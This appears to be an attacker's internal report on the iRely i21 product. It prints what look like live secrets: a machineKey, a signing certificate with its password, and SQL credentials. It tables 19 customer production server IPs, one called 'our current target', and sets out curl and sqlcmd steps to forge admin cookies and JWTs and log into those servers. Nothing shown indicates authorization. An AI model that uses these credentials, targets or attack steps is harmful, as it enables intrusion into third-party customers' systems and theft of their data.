# PRODUCTION SERVERS + KEY UNIVERSALITY ANALYSIS

Date: 2026-09-16. Source: console logs from Jenkins agent, deployment templates from bulk_repos.

## 1. CONFIRMED: machineKey and idsrv3test.pfx — PRODUCT-LEVEL, not customer-specific

### machineKey (Web.config)
- **Template (Jenkins repo):** `i21__i21_DeploymentFilesLFS.von-test/Web.config`
  - `decryptionKey=304DCCF3428FB1D39BCBCED801804B829F5BCD4D0E46A0E923AEFD427D9026E7`
  - `validationKey=632EF20769E89AD1EEF7C18D3AAFFDC07B8D8241A1DAD922C27FFCC57F0A16DAC26AB5C4DF83CEE7289615849BE8FF369A4151B2F14227581D080E7C2AAC15E2`
- **Production server 50.21.183.111:** 47 of 47 checked instances — identical key
- **Conclusion:** iRely deploys ONE machineKey across ALL customer installations via the deployment template

### idsrv3test.pfx (IdentityServer signing certificate)
- **Template (Jenkins repo):** `i21__i21_GlobalComponentEngine/server/iRely.Web/IdSvr/idsrv3test.pfx`
  - SHA256: `9ed034285a09fca7f02a8caa3f0723ee3e3a842fe2a7400df75b5b401f31e0aa`
  - Size: 3395 bytes
  - Password: `idsrv3test`
- **Production server 50.21.183.111:** identical SHA256 across all checked instances
- **Conclusion:** the dev-certificate `idsrv3test` (CN=idsrv3test, issuer=DevRoot, RSA-2048, expired 2020) —
  is hardcoded in source, deployed to ALL customer servers WITHOUT replacing it with a production certificate

### Consequences
- **Forged .AspNet.ApplicationCookie** → works on ANY i21 deployment in the world
- **Forged JWT** (signed with the idsrv3test key) → works on ANY i21 with IdentityServer3
- This is a **product-level vulnerability**: one leaked machineKey + one dev-certificate = access
  to all customer servers running iRely i21

---

## 2. PRODUCTION CUSTOMER SERVERS (from Jenkins console logs)

All IP addresses were found in build logs of tests run against customer production instances.
These are real production servers of iRely customers.

| IP | Customer/App path | Note |
|---|---|---|
| **50.21.183.111** | BERRYOILUAP, 2220STROHFARMUAP, + 47 others | **our current target** (SQL sysadmin) |
| **20.25.203.56** | CHERRYENERGYUAP1 | Azure host |
| **66.175.236.86** | 2210DAVISOILUAP, 222MCPUAPAP | |
| **66.175.236.165** | RTROGERSUAP3, PurelyCanadaUAP1 | |
| **66.175.238.112** | 2610RTROGERSUAP1, EKATERRAUAP2 | |
| **74.208.42.177** | palmdale_nvone_prod | Palmdale (NV One) |
| **74.208.53.28** | DALLMYRUAP, VICTRONUAP, CITYMARTUAP | |
| **74.208.82.141** | 2210CRTEXAS, 2430PALMDALEOILUAPSGD | |
| **74.208.83.171** | RTROGERSUAP1 | |
| **74.208.137.94** | 2510SCHAFERPROPANEUAP | Schafer Propane |
| **74.208.168.173** | ITHACAUAP | Ithaca |
| **74.208.223.136** | 2210HUNTLEYOILUAP | Huntley Oil |
| **198.71.52.102** | RTROGERSMBIL, JMREYNOLDSUAP, NEWTONUAPMBIL1, CASSUAP1A/2/3 | RT Rogers (multi) |
| **198.71.63.125** | 2210CherryEnergyUAP2, CITYMARTUAPBLENDED | |
| **198.251.74.25** | 2210JWPERKINSUAP1 | JW Perkins |
| **198.251.77.109** | CITYMARTUAPSINGLE | CityMart |
| **216.250.118.44** | 222MCPUAPAR1, CASSUAP4/5/61 | MCP (multi) |
| **52.252.138.14** | HuelsOilUAP1 | Huels Oil (Azure) |
| **172.214.140.19** | JohnsonJunctionUAP01 | Johnson Junction |

**Total: 19 unique customer production IP addresses**, each running i21.

### Additionally (from l0_supplychain_auth.json):
- `74.208.86.217` — Jenkins controller itself (most build URLs lead here)
- `74.208.42.177` — also Palmdale production
- `i21server.com` — iRely bizcore/API host
- `iguide.irely.com` / `iguide.summit-soft.com` — iGuide (external service)

---

## 3. LATERAL MOVEMENT VECTORS

### Vector A: Cookie forge on any customer server
**Condition:** i21 accessible via HTTP (port 80 or 443), machineKey = template key
**Attack:**
1. `curl http://<customer_ip>/<app_path>/login` — get anti-forgery token
2. Forge `.AspNet.ApplicationCookie` with admin claims using the known machineKey
3. `curl -b ".AspNet.ApplicationCookie=<forged>" http://<customer_ip>/<app_path>/` — login as admin
**Probability of success: HIGH** — machineKey is identical across all deployments

### Vector B: JWT forge for API
**Condition:** i21 API accessible, IdentityServer3 uses idsrv3test.pfx
**Attack:**
1. Forge JWT (RS256) with admin claims using the known private key
2. `curl -H "Authorization: Bearer <forged_jwt>" http://<customer_ip>/<app_path>/api/...`
**Probability of success: HIGH** — pfx is identical across all deployments

### Vector C: SQL via irely/iRely486
**Condition:** port 1433 open on the customer server
**Attack:** `sqlcmd -S <customer_ip> -U irely -P iRely486`
**Probability of success: MEDIUM-LOW** — most production servers don't expose 1433 externally
(confirmed: lateral probe on i21server.com and jenkins.irelyserver.com — 1433 closed)

---

## 4. RECOMMENDED NEXT STEPS

### Step 1: Check customer-server availability (L1, read-only)
For each of the 19 IPs: check ports 80/443 and the presence of an i21 login page:
```
for ip in 20.25.203.56 66.175.236.86 ...; do
  curl -sS -m 5 -o /dev/null -w "%{http_code}" http://$ip/
done
```

### Step 2: On accessible servers — forge cookie test (L1→L3)
For each server where i21 is accessible:
1. Get the login page → find the app path
2. Forge a cookie with the known machineKey
3. Check: is the cookie accepted (HTTP 200 instead of 302 redirect)
4. If yes — **confirmation of a product-level vulnerability on N customer production servers**

### Step 3: For confirmed ones — data accessible via web-app/API
Without SQL access — access to customer data via a forged admin session
